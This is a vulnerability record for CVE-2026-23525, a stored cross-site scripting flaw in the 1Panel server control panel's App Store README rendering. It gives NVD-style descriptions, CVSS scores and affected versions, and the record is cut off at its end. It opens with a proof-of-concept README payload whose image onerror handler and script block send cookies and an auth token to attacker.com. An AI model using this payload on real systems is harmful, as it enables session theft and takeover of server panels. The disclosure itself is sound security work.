CVE-2026-23525

<!-- 恶意应用README payload示例 --> # Malicious App <img src=x onerror="fetch('https://attacker.com/steal?cookie='+document.cookie)"> <!-- 或使用script标签 --> <script> // 窃取用户会话信息 var session = document.cookie; var data = JSON.stringify({ url: window.location.href, cookie: session, localStorage: localStorage.getItem('auth_token') }); // 发送到攻击者控制的服务器 fetch('https://attacker.com/collect', { method: 'POST', body: data, headers: {'Content-Type': 'application/json'} }); // 进一步利用：修改用户设置或提权 console.log('XSS Payload Executed'); </script>

{"cve": {"id": "CVE-2026-23525", "sourceIdentifier": "[email protected]", "published": "2026-01-18T23:15:48.220", "lastModified": "2026-03-13T14:29:08.653", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "1Panel is an open-source, web-based control panel for Linux server management. A stored Cross-Site Scripting (XSS) vulnerability exists in the 1Panel App Store when viewing application details. Malicious scripts can execute in the context of the user’s browser, potentially compromising session data or sensitive system interfaces. All versions of 1Panel up to and including v1.10.33-lts and v2.0.16 are affected. An attacker could publish a malicious application that, when loaded by users (locally or remotely), can execute arbitrary scripts. This may result in theft of user cookies, unauthorized access to system functions, or other actions that compromise the confidentiality, integrity, and availability of the system. The vulnerability is caused by insufficient sanitization of content rendered by the MdEditor component with the `previewOnly` attribute enabled. Specifically, the App Store renders application README content without proper XSS protection, allowing script execution during content rendering; and similar issues exist in system upgrade-related components, which can be fixed by implementing proper XSS sanitization in the MdEditor component. These vulnerabilities can be mitigated by applying proper XSS protection and sanitization when rendering content in the MdEditor component. Safe versions with a patch incorporated are v1.10.34-lts and v2.0.17."}, {"lang": "es", "value": "1Panel es un panel de control de código abierto, basado en web, para la gestión de servidores Linux. Una vulnerabilidad de cross-site scripting (XSS) almacenado existe en la Tienda de Aplicaciones de 1Panel al ver los detalles de la aplicación. Scripts maliciosos pueden ejecutarse en el contexto del navegador del usuario, potencialmente comprometiendo datos de sesión o interfaces sensibles del sistema. Todas las versiones de 1Panel hasta e incluyendo v1.10.33-lts y v2.0.16 están afectadas. Un atacante podría publicar una aplicación maliciosa que, cuando es cargada por los usuarios (local o remotamente), puede ejecutar scripts arbitrarios. Esto puede resultar en el robo de cookies de usuario, acceso no autorizado a funciones del sistema u otras acciones que comprometan la confidencialidad, integridad y disponibilidad del sistema. La vulnerabilidad es causada por una sanitización insuficiente del contenido renderizado por el componente MdEditor con el atributo 'previewOnly' habilitado. Específicamente, la Tienda de Aplicaciones renderiza contenido README de la aplicación sin la protección XSS adecuada, permitiendo la ejecución de scripts durante la renderización del contenido; y problemas similares existen en componentes relacionados con la actualización del sistema, los cuales pueden ser solucionados implementando una sanitización XSS adecuada en el componente MdEditor. Estas vulnerabilidades pueden ser mitigadas aplicando protección y sanitización XSS adecuadas al renderizar contenido en el componente MdEditor. Las versiones seguras con un parche incorporado son v1.10.34-lts y v2.0.17."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:H/UI:R/S:U/C:H/I:H/A:H", "baseScore": 6.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "HIGH", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 0.5, "impactScore": 5.9}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:H/I:H/A:H", "baseScore": 8.4, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.7, "impactScore": 6.0}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:fit2cloud:1panel:*:*:*:*:*:*:*:*", "versionEndExcluding": "1.10.34", "matchCriteriaId": "F5968FDD-8F6D-487E-9326-0949B42D2BA3"}, {"vulnerable": true, "criteria": "cpe:2.3:a:fit2cloud:1panel:*:*:*:*:*:*:*:*", "versionStartIncluding": "2.0.0", "versionEndExcluding": "2.0.17", "matchCriteriaId": "5D333955-D761-4982-A30A-D59D1735FCFD"}]}]}], "references": [{"url": "https://github.com/1Panel-dev/1Panel/security/advisories/GHSA-mg24-6h5c-9q42", "source": "[email protected]", "tags": ["V ... (truncated)